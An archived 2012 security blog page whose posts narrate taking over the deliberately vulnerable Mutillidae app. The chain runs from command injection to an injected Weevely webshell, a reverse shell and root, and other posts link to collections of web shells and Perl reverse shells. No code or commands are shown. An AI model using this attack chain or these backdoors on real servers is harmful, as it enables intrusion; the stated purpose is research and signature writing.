So, we have written an article about PHP Command Injection (Applies to other platforms too, we just covered PHP).
Read it here! PHP Command Injection - Insecurety Research
More to come...
~Insecurety Research Team.
Showing posts with label Backdoor. Show all posts
Showing posts with label Backdoor. Show all posts
Thursday, 15 March 2012
Wednesday, 7 March 2012
[Article] Reverse shells...
Ok. So I wrote a short article yesterday showing off a few reverse shell tricks and demoing them on a vulnerable web app using a Command Injection vulnerability.
Some people were asking "why it so basic?" and here is why: The idea of the article is not to provide script kids/blackhats with new info - it is well known - but to demonstrate how one can go from a small PHP bug to a full blown reverse shell.
I will be working up SNORT IDS Signatures for them all based on how they throw a shell back, just have to get some nice .pcaps of it first. I plan to also find a way to "signature" the IDS evading shellcode I wrote - and so kind of have an "arms race" with myself...
Article on Insecurety.net
Some people were asking "why it so basic?" and here is why: The idea of the article is not to provide script kids/blackhats with new info - it is well known - but to demonstrate how one can go from a small PHP bug to a full blown reverse shell.
I will be working up SNORT IDS Signatures for them all based on how they throw a shell back, just have to get some nice .pcaps of it first. I plan to also find a way to "signature" the IDS evading shellcode I wrote - and so kind of have an "arms race" with myself...
Article on Insecurety.net
Friday, 2 March 2012
WebApp Haxploitation with Weevely, Introducing InterSect.
Ok. This is a fairly pointless demo I made to demonstrate how a web-application bug (in this case LFI + Command Injection) can be leveraged to gain complete root access over a server. I simply took a bunch of screencaps during the demo I made to show a friend "Why web app bugs are dangerous".
So. Here goes!
The web app we used here was THIS: Mutillidae - IronGeek
Part One: The Buggy Page.
This shows the buggy applications vulnerable page. It is a simple "Do a DNS lookup" page that just by looking at we can discern certainly has a Local File Inclusion vulnerability, and more than likely a Command Injection vulnerability.
Part Two: Lets Look for LFI
So. I knew there was LFI, and decided I would let fimap check for me, to see could I pull off any LFI-RCE stuff.
So. Now we know Fimap no canhaz RCE on the site, however there IS LFI. I want RCE, so I move swiftly along to the second vulnerability - Command injection.
Part Three: Command Injection
I decided to inject a Weevely Webshell into the app, so I put it up on my webserver and used wget to "inject" it.
Here is a screencap...
Ok. Shell seems injected, so we move on and try connect to it using the Weevely Client.
Part Four: There are Weevils In Your WWWROOT
Connecting to Weevely's PHP backdoor with the client. This is too easy...
So, lets see what it looks like in there...
SO! Got remote code execution and a "shell" like session. Let's see does Weevely's reverse shell work for us and try become uid=0 :D
Part Five: Netcat Sais Meow
First off, we start Weevely's reverse shell plugin and tell it to phone home to us... We will be listening for it...
Ok. Now for the listener end of things...
w00t! We haz a shell :D
... Moving Swiftly along...
We decide to check kernel version and randomly see what commands work. I decided to lsusb for some arbitrary reason. Don't ask.
Ok. So we move on to escalating/exploring!
Part Six: Enter InterSect.
So I decide to test out InterSect, a wonderful post-exploitation tool developed by ohdae of BindShell Labs.
Here is a screencap of wgetting Intersect to the target box...
Aaaaand now to RUN Intersect ......
Ok. Intersect does not want to run as NON root, so it tells me how to get root on the box... Seeing as I like root... lets go get some!
Part Seven: We Are uid=0, + Harvest Some Infodox
So. I simply run a hypothetical root-exploit I had left in /tmp and getr00t! (It was actually a SUID shell I dropped earlier, as my kernel doesnt like localroots and panics!)
So. Got root. What next? Lets try see does InterSect want to run this time...
It Works! Sadly my battery promptly /quit a moment later but I think you get the idea of what you can do!
LINKS:
BindShell Labs
Intersect 2 - GitHub
Weevely - GoogleCode
Fimap - GoogleCode
And Finally
Insecurety Research
So. Here goes!
The web app we used here was THIS: Mutillidae - IronGeek
Part One: The Buggy Page.
This shows the buggy applications vulnerable page. It is a simple "Do a DNS lookup" page that just by looking at we can discern certainly has a Local File Inclusion vulnerability, and more than likely a Command Injection vulnerability.
Part Two: Lets Look for LFI
So. I knew there was LFI, and decided I would let fimap check for me, to see could I pull off any LFI-RCE stuff.
So. Now we know Fimap no canhaz RCE on the site, however there IS LFI. I want RCE, so I move swiftly along to the second vulnerability - Command injection.
Part Three: Command Injection
I decided to inject a Weevely Webshell into the app, so I put it up on my webserver and used wget to "inject" it.
Here is a screencap...
Ok. Shell seems injected, so we move on and try connect to it using the Weevely Client.
Part Four: There are Weevils In Your WWWROOT
Connecting to Weevely's PHP backdoor with the client. This is too easy...
So, lets see what it looks like in there...
SO! Got remote code execution and a "shell" like session. Let's see does Weevely's reverse shell work for us and try become uid=0 :D
Part Five: Netcat Sais Meow
First off, we start Weevely's reverse shell plugin and tell it to phone home to us... We will be listening for it...
Ok. Now for the listener end of things...
w00t! We haz a shell :D
... Moving Swiftly along...
We decide to check kernel version and randomly see what commands work. I decided to lsusb for some arbitrary reason. Don't ask.
Ok. So we move on to escalating/exploring!
Part Six: Enter InterSect.
So I decide to test out InterSect, a wonderful post-exploitation tool developed by ohdae of BindShell Labs.
Here is a screencap of wgetting Intersect to the target box...
Aaaaand now to RUN Intersect ......
Ok. Intersect does not want to run as NON root, so it tells me how to get root on the box... Seeing as I like root... lets go get some!
Part Seven: We Are uid=0, + Harvest Some Infodox
So. I simply run a hypothetical root-exploit I had left in /tmp and getr00t! (It was actually a SUID shell I dropped earlier, as my kernel doesnt like localroots and panics!)
So. Got root. What next? Lets try see does InterSect want to run this time...
It Works! Sadly my battery promptly /quit a moment later but I think you get the idea of what you can do!
LINKS:
BindShell Labs
Intersect 2 - GitHub
Weevely - GoogleCode
Fimap - GoogleCode
And Finally
Insecurety Research
Tuesday, 21 February 2012
Web Malware Collection - more Updates!
So, I have been grepping and searching through logs and google searches, hunting for malware to add. And oh lord, I am finding a LOT!
Lately I started hunting through pastebin for "more malware" and such, and am slowly amassing a fairly epic amount to sort. Also have to handle submissions, Honeypot logs, etc.
So, check out the project page! Web Malware Collection
Lately I started hunting through pastebin for "more malware" and such, and am slowly amassing a fairly epic amount to sort. Also have to handle submissions, Honeypot logs, etc.
So, check out the project page! Web Malware Collection
Thursday, 16 February 2012
Web Malware Collection Updated
Ok, quick post. The Web Malware Collection has had some updates done, and I am *Still* busy sorting samples to commit.
Currently it has 443 samples (according to this
Project Page: http://insecurety.net/projects/web-malware/
GoogleCode: http://code.google.com/p/web-malware-collection/
SVN repo is on googlecode so SVN up :D
Currently it has 443 samples (according to this
"find . -type f | wc -l" command)Project Page: http://insecurety.net/projects/web-malware/
GoogleCode: http://code.google.com/p/web-malware-collection/
SVN repo is on googlecode so SVN up :D
Monday, 30 January 2012
Web Application Backdoors Collection: v2.0
This is the SVN for web app backdoors. As I find em, I add em. I also try purge dupes time to time, but have not yet got a good method of doing so just yet.
I also plan to eventually analyse them for backdoors, so if you find a backdoor in one please mail me so I can mark it as backdoored.
Finally, I take NO RESPONSIBILITY WHATSOEVER for ANY use of this collection, it is designed for educational purposes and so you AV people can write signatures for this shit.
So SVN UP!!
Web Shell Collection
I also plan to eventually analyse them for backdoors, so if you find a backdoor in one please mail me so I can mark it as backdoored.
Finally, I take NO RESPONSIBILITY WHATSOEVER for ANY use of this collection, it is designed for educational purposes and so you AV people can write signatures for this shit.
So SVN UP!!
Web Shell Collection
Friday, 27 January 2012
Web Backdoors: Video
This is a video I made to quickly demonstrate some Web App Backdoors.
I demonstrate Weevely; FireInTheHole.py; PHPSploit; and two standard "web shells", the WSO2.php shell and the ITSecTeam shell.
I occasionally comment on each ones shortfalls, but here is the simple TL;DR one.
Weevely is amazing to use, has LOADS of features, the netcat bind and backconneect shells work perfectly, but it is slightly confusing for the first time user. It also remembers your current working dir and has a very intuitive shell (just like BASH) and fairly good error handling.
You can get it HERE: Weevely
FireInTheHole.py is fast, simple to use, uses both POST and/or GET and gives a terminal like session. It has no advanced features but has a couple of bugs, namely its non-interactive state. It *does* remember your current working dir however, which is very advantageous.
You can download it HERE: Fireinthehole.py
PHPSploit is a VERY nice "framework" which is currently in beta and has great potential. It looks a LOT like Metasploit, and I envision it becoming popular sometime in the future. It works fine, allows you to pull a lot of info, however it has some issues. It does not remember current working dir at all, so it can be rather annoying to "stack" commands for different dirs.
You can download it HERE: PHPSploit
I then demo the WSO2 PHP backdoor, which was failing pretty hard (some functions missing) and the ITSecTeam PHP backdoor, which seems designed to be "skid friendly" and has loads of features. I suspect both may be backdoored but have not investigated... YET. Neither had a functional backconnect or bindshell, and had a load of errors/bugs. I recommend *not* using these. You may find examples on google, and I plan to upload them myself later.
Now its video time!
I demonstrate Weevely; FireInTheHole.py; PHPSploit; and two standard "web shells", the WSO2.php shell and the ITSecTeam shell.
I occasionally comment on each ones shortfalls, but here is the simple TL;DR one.
Weevely is amazing to use, has LOADS of features, the netcat bind and backconneect shells work perfectly, but it is slightly confusing for the first time user. It also remembers your current working dir and has a very intuitive shell (just like BASH) and fairly good error handling.
You can get it HERE: Weevely
FireInTheHole.py is fast, simple to use, uses both POST and/or GET and gives a terminal like session. It has no advanced features but has a couple of bugs, namely its non-interactive state. It *does* remember your current working dir however, which is very advantageous.
You can download it HERE: Fireinthehole.py
PHPSploit is a VERY nice "framework" which is currently in beta and has great potential. It looks a LOT like Metasploit, and I envision it becoming popular sometime in the future. It works fine, allows you to pull a lot of info, however it has some issues. It does not remember current working dir at all, so it can be rather annoying to "stack" commands for different dirs.
You can download it HERE: PHPSploit
I then demo the WSO2 PHP backdoor, which was failing pretty hard (some functions missing) and the ITSecTeam PHP backdoor, which seems designed to be "skid friendly" and has loads of features. I suspect both may be backdoored but have not investigated... YET. Neither had a functional backconnect or bindshell, and had a load of errors/bugs. I recommend *not* using these. You may find examples on google, and I plan to upload them myself later.
Now its video time!
Thursday, 5 January 2012
Collection of web app backdoors (v1)
This is a collection of the common PHP (and ASP if I find them) backdoors used by malicious hackers to take over servers.
I am NOT responsible for your use of this!
Warning: There is every possibility these backdoors may be backdoored. I am going to eventually sort them into two folders - backdoored backdoors and clean backdoors. Then I can sit back and watch y'all go apeshit at some skiddies who backdoor their backdoors :D
Download the list here...Web Backdoors
I am NOT responsible for your use of this!
Warning: There is every possibility these backdoors may be backdoored. I am going to eventually sort them into two folders - backdoored backdoors and clean backdoors. Then I can sit back and watch y'all go apeshit at some skiddies who backdoor their backdoors :D
Download the list here...Web Backdoors
Tuesday, 3 January 2012
Quick Post - package of Perl shells
Ok, very short post. 4 Perl shells/backdoors, 3 are reverse shells and one is a Bind shell. Seems to me everyone uses the same trick to get reverse shell :/
Anyways, more to come later! Download link below!
Perl Shells Tarball
Anyways, more to come later! Download link below!
Perl Shells Tarball
Subscribe to:
Posts (Atom)